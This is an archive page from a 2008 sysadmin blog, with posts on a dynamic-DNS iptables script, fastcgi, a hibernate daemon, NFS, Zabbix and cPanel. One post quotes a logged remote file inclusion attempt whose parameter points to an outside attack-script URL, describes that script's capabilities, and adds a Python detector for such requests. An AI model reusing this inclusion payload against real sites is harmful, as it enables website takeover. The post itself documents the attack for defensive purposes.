Archive for the ‘System Administration’ Category

Dynamic DNS Iptables Firewall Script

Thursday, October 9th, 2008

I’m using my computer as a development platform and I usually let people in by editing my firewall active table

but for those with dynamic ip addresses I had to figure out a different solution

so I made a small script in PHP to check for my friend’s dynamic ip address by looking up his dyndns.org hostname

it checks the IP then goes to sleep for 5 minutes

when it detects an ip change it updates the firewall by flushing my friend’s chain and adding a rule to let him access my webserver

this script works in my firewall iptables setup, it could work on yours but you have to be smart and figure that out for yourself, I’m not giving any guarantees for this, use it as GPL V3 code :)
if you want me to help you set it up, just contact me

here’s the code:

#!/usr/bin/php
<?php
/*
use this code as GPL V3 licence says
Copyright (C) 2008, Miroslav Madzarevic, All Rights Reserved
*/
$old_ip = '';

while (1) {

    sleep (300);

    $host = 'friend.dyndns.org';

    // preg_quote() makes the dots in the hostname match literally
    if (!preg_match('/^'.preg_quote($host, '/').' has address ((?:\d{1,3}\.){3}\d{1,3})$/',
           exec ('/usr/bin/host '.escapeshellarg($host)), $matches)) {
        echo "IP problems\n";
        continue;
    }

    $ip = $matches[1];

    $ip_parts = preg_split ('/\./', $ip, -1, PREG_SPLIT_NO_EMPTY);

    if (count($ip_parts) != 4) {
        echo "wrong ip parts count\n";
        exit;
    }

    $good = array();

    foreach ($ip_parts as $ip_part) {
        $ip_part = (int) $ip_part;
        // each octet of an IPv4 address is 0-255
        if ($ip_part < 0 or $ip_part > 255) {
            echo "wrong ip part, $ip_part\n";
            exit;
        }
        $good[] = $ip_part;
    }

    $new_ip = join('.', $good);

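    if ($old_ip != $new_ip) {

        // drop the rule for the old address
        `/sbin/iptables -F friend`;

        // let the new address reach the webserver on port 80 ($new_ip was rebuilt from validated integers above)
        `/sbin/iptables -A friend -s $new_ip/32 -p tcp -m tcp --dport 80 -j ACCEPT`;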

        $old_ip = $new_ip;
    }
}

?>

fastcgi mod_fcgid

Wednesday, October 1st, 2008

I’ve been playing a little on my cPanel hosting trying to get maximum speed while also enforcing security when running php scripts

I first started with security running mod_suphp and while it worked fine it lacked the speed of the DSO php (mod_php)

so I read a thing or two about fastcgi and enabled it

I’m pleasantly surprised by the speed of the hosting

each user got its own persistent php application running requests (actually it’s limited to 500 php requests per php5 process by MaxRequestsPerProcess 500 directive)

I’m keeping an eye on the memory consumption but I hope I’ll be able to keep running with this setup

and while I got php running as the actual cPanel user, apache is still running as nobody for other requests… hmmm… I’m using apache 2.2 with MPM Prefork… maybe I should try a different MPM?


C++ Hibernate Daemon

Wednesday, April 30th, 2008

I use Fluxbox window manager on Ubuntu Linux where I don’t have all the bells and whistles of GNOME or KDE.

so I thought I’d make myself a daemon program that will automatically put my computer to hibernate when my laptop battery is almost empty

usually I take care that my battery doesn’t get to the red zone but this is for those few cases I forget

I wrote this small program in C++

why c++

well because I don’t program in c++ and I found it interesting to do so :)

main.cpp looks like this

so, you see the locations of the info and state file for the laptop battery, the percent at which we go to hibernation (I’ve set it to 12%), and the sleep interval before checking the battery state again (10 seconds)

I use my own hibernate script but you could use something like /usr/sbin/hibernate

you can change all of these

in the main function you can see that:

  • we work only as a root user
  • we daemonize (detach from the terminal and run in background)
  • instantiate a worker class object
  • and do our work :)

and what is our work? check out this picture

worker.cpp

well we get the battery total capacity and current capacity and then we calculate the percent

if the percent is less than what I want (12%) then I want my laptop to go to hibernation

but I also made a security check (that you can remove if you like)

that makes sure my laptop doesn’t go twice into hibernation in succession

why did I do that?

well because I parse data from some files I have no influence over

and those files can change their format anytime

so this is just a precaution

I have a simple makefile that compiles this code, copies it to /usr/local/bin/medved (medved in my language means a bear and bears hibernate ;) ) and adds an entry to /etc/rc.local so that it starts next time you reboot your box automatically

you can also start it by hand and see how it works before the reboot

and that’s it, now I have a daemon that puts my laptop to hibernation before my battery runs dry

I’ve published the source code under GPL licence version 3

you can get source code here


Internet Bad People

Tuesday, April 15th, 2008

there are bad people everywhere and internet is no exception

wherever there are people, there are good and bad people

let’s talk about bad people on the internet misusing osadmin.com

what do they do?

a couple of things

some do referrer poisoning

it’s a technique where they visit your website or just ask for parts of it (images etc.) using fake referrers

why do they do it?

well they hope their website (or their website URL) will turn up in your web statistics software and you’ll click there

they’re just spammers that want you to go there and read an ad or possibly get infected by a virus or similar

next there are people who steal your content

I said on my website that all of this is copyrighted by me

but they have automatic bots, programs, that search the web for blogs and other stuff and steal content

some of them, the more decent ones, just use like 2 lines or so from my website and link to my website

but some of them use all the text from a blog article without mentioning the source

like this one

Host: 70.94.6.217 /mire_blog/wp-includes/images/smilies/icon_smile.gif
Http Code: 200 Date: Apr 14 22:27:48 Http Version: HTTP/1.1 Size in Bytes: 174
Referer: http://weblog.xanga.com/lyudi/652178887/waiting-the-water.html
Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 1.1.4322)

here you see his ip address, the url he tried to open on my website (the smiley icon), date when he did it and the referrer
when you actually go there you see my content without the link to my website but before that, he grays the screen and asks for your email address so he can spam you a bit more
oh yeah, and that user agent (mozilla etc.) is fake also

and then there are those who try to break my website by using wordpress crack programs
they are called script kiddies because they use cracking programs somebody else wrote
most of them are teenagers that instead of getting high by thinking about chicks get high on breaking and destroying other people’s websites ;)

now, here’s an example

/category/rss.php?phpraid_dir=http://mcleanmkting.com/catalog/images/default/iyes.txt??
Http Code: 302 Date: Apr 15 01:28:10 Http Version: HTTP/1.1 Size in Bytes: 468
Referer: -
Agent: libwww-perl/5.808

here you see this client asked for my rss and he provided a parameter called phpraid_dir with the url http://mcleanmkting.com/catalog/images/default/iyes.txt??
that means he tried to use that url as an include file in my website script
that is not a text file but a program, a php file that tries to see which of the shell commands work on my system
it also reports which operating system I am using, disk free space etc.

then, it tries to load a perl script from the url http://mcleanmkting.com/catalog/images/default/hai.txt using various download methods because they don’t know which ones work on my system

this perl script is meant to take over the website and to report to the cracker on IRC so he can use the IRC to control my website ;)

the program accepts instructions from nicks sec or SNapper and it communicates with them via IRC private messaging

it’s got a watcher for milw0rm rss feed, tcp/udp flooder, portscan, log destroyer, emailer etc.
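
The two log entries quoted above can be triaged mechanically. This is an added example, not the author's code: it parses records in that layout and flags query parameters whose value is a URL, HTTP-library user agents and off-site referrers. The function names, the `own_host` default and the third sample record are assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# First two records are copied from the post; the third is a constructed benign control.
SAMPLE = """\
Host: 70.94.6.217 /mire_blog/wp-includes/images/smilies/icon_smile.gif
Http Code: 200 Date: Apr 14 22:27:48 Http Version: HTTP/1.1 Size in Bytes: 174
Referer: http://weblog.xanga.com/lyudi/652178887/waiting-the-water.html
Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 1.1.4322)

/category/rss.php?phpraid_dir=http://mcleanmkting.com/catalog/images/default/iyes.txt??
Http Code: 302 Date: Apr 15 01:28:10 Http Version: HTTP/1.1 Size in Bytes: 468
Referer: -
Agent: libwww-perl/5.808

Host: 192.0.2.10 /category/rss.php?paged=2
Http Code: 200 Date: Apr 15 02:00:00 Http Version: HTTP/1.1 Size in Bytes: 5120
Referer: http://osadmin.com/
Agent: Mozilla/5.0 (X11; Linux i686)
"""

REMOTE_URL = re.compile(r"^\s*(?:https?|ftp)://", re.I)           # a URL passed as a parameter value
SCRIPTED = re.compile(r"^(?:libwww-perl|lwp|curl|wget)\b", re.I)  # HTTP libraries, not browsers

def parse_records(text):
    records = []
    for block in re.split(r"\n\s*\n", text.strip()):   # records are separated by blank lines
        first, *rest = block.strip().splitlines()
        fields = dict(line.split(": ", 1) for line in rest if ": " in line)
        records.append({"request": first.split()[-1],  # last token of line 1 is the requested URL
                        "status": int(fields["Http Code"].split()[0]),
                        "referer": fields.get("Referer", "-"),
                        "agent": fields.get("Agent", "")})
    return records

def findings(rec, own_host="osadmin.com"):
    """Return the reasons a record deserves a closer look; an empty list means none."""
    out = [f"remote-include:{name}"
           for name, value in parse_qsl(urlsplit(rec["request"]).query, keep_blank_values=True)
           if REMOTE_URL.match(value)]
    if SCRIPTED.match(rec["agent"]):
        out.append("scripted-agent")
    ref_host = urlsplit(rec["referer"]).hostname       # None for "-" (no referrer sent)
    if ref_host and ref_host != own_host and not ref_host.endswith("." + own_host):
        out.append(f"offsite-referer:{ref_host}")
    return out

def scan(text):
    return [(r["request"], r["status"], findings(r)) for r in parse_records(text)]
```

Run over the sample, `scan(SAMPLE)` reports `remote-include:phpraid_dir` and `scripted-agent` for the `rss.php` request, `offsite-referer:weblog.xanga.com` for the smiley request, and nothing for the control record.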

I’m a programmer/sysadmin so those tricks will not be so successful on me/my website as they might be on the others because I update my software and track my website activity

I’ve always been a whitehat, meaning I try to make websites work and I write code to do some work

instead those people are blackhat, crackers trying to destroy your website for their own personal benefit

and they’re getting worse by the day

I hope this has been informative, check back osadmin.com for more later


Solaris Express Developer Edition

Monday, January 21st, 2008

A few days ago, I got an OpenSolaris DVD from a friend containing various developer tools and I decided to try it out.

The DVD I got is released quarterly and can be found here.

I decided to try it out. The install process was simple but it lasted forever, I couldn’t believe it was over when it finished. Well actually it wasn’t really finished, because after booting it for the first time it took like 10 minutes to actually start the GUI.

OpenSolaris really isn’t a polished product. At least from a standpoint of a desktop user.

My screen was in the correct resolution, and the nvidia drivers were there but the refresh rate was like 50 Hz instead of 60Hz.

Next, I found out my network card was not working… I searched the internet for VIA Rhine II and found drivers here. Next, I found out resolv.conf file did not even exist ;)

I created one, populated some name servers and set up the default gateway to my router.

But again I was out of luck, the dig tool was working but I couldn’t connect to any site on the net. With some googling I found out I had to copy nsswitch.dns to nsswitch.conf

Wow, talk about a user friendly OS ;)

I found a good package repository run by the Blastwave guys. Check it out.

I named my OpenSolaris Horus. Horus was Egypt’s Sun God at the time the pharaohs ruled.

Now, I’m running vncserver on Solaris that I use via vncviewer from my Ubuntu GNU/Linux laptop.

Here’s a picture of it through my vncviewer. I’m running fluxbox window manager btw :)

opensol.jpg


NFS

Tuesday, January 8th, 2008

It’s so easy to set up an NFS server. I needed NFS so I could export my OGG files to my dbox.

I’m running Ubuntu.

Here are the commands

root@warlock:/etc# apt-get install portmap nfs-kernel-server

After that, I had to edit my /etc/exports file

root@warlock:/etc# cat /etc/exports
/exports dbox(ro,sync)

And now, whenever I change the contents of /etc/exports I need to do exportfs -ra


Zabbix

Monday, December 31st, 2007

Zabbix is a network monitoring solution. I used to play with Nagios but I find Zabbix a better product. Simpler to install, easier to use, better web interface.

Zabbix works in a client/server mode. Client is called an agent ;) so on each box you want monitored you install the agent. The server gets installed either with mysql or with postgresql database support. I opted for mysql. The install was done on my laptop Ubuntu. I had some problems early on since my server didn’t see my client.
This was because of the server or client settings that I changed. Since installing both products I noticed a lot of forks/threads in the process list and I wanted to cut down the number of those by editing a config file.
Don’t do that, Zabbix doesn’t like that ;)

Now I got 25 Zabbix instances in my process list

root@warlock:/tmp# ps aux|grep zabbix|grep -v grep|wc -l
25

Anyway, Zabbix looks nice. I can monitor everything related to how my box functions. I had to clone 2 eth0 rules (incoming and outgoing) and make it work for my wireless network. I just changed eth0 to ath0 both times after cloning.

I have to figure out how to send daily reports to my email :)


Take 4 by Netenberg

Sunday, December 30th, 2007

Today, I got to install a package of programs called Take4 by Netenberg.

You get Fantastico De Luxe (what a fine name ;)), Universina (you’ll never guess what is this for), Click Be! (another fine name) and AccountLab Plus.

*sarcasm start* Wow, it felt great to have these De Luxe, Universal, Plus programs! *sarcasm end*

Universina is actually a template for cPanel and I don’t like it. Neither does my client.

Fantastico is actually the reason we got this bundle, it’s ok but I didn’t see some of the scripts I expected… Maybe I had to install the unstable version to get them…

Click Be! is a tool that won’t work with my php suexec. We’ll see what happens with this one.

And AccountLab plus is already included with Fantastico De Luxe.


eGroupWare

Wednesday, December 26th, 2007

I’ve set up egroupware before and it works ok, you get various applications: FeLaMiMail (what a strange name) for email, a calendar, address book, document management, project manager, resources, tracker, file manager, and even wiki. That’s a lot of applications. I saw a gallery php script integration module not bundled here, there are probably more applications.

The thing with egroupware is that installation can be quite complicated. I installed from source on CentOS 5 and after fixing numerous things it complained about I got almost lost in the installation process. Once I finished the installation I noticed you can not change the language. The only language available was English and my client wanted German. So I drilled Google for answers and drilled some more and found out I had to install it in German to have German language available later on. WTF! So I did that, and it was not easy since I don’t know German that well and I got it working. Now I can choose only German and English languages…


cPanel / WebHost Manager

Sunday, December 23rd, 2007

Some time ago, I started doing a project for a webhosting company, Dazelos. We originally thought about using Virtual Hosting Control System (VHCS for short) but we ran into some problems. Then we looked into other options like Plesk and also found some problems. Then we tried cPanel and it worked :)

We used cPanel test licence to try it out on a brand new CentOS 5 box but the bind DNS server had some issues, the domains would not resolve. Upon further inspection I found out that the format of the named.conf file changed in CentOS 5. I modified the file by hand and it worked.

After the testing phase we decided to deploy the setup. The server box is a Dual Core Intel Xeon CPU with 2 gigabytes of RAM, two fast RAID hard drives and a backup hard drive. And it’s fast :)

The beauty of cPanel is that it does security and updates for you. Meaning you can take a vacation and your server box should be running smoothly like when you left it :)
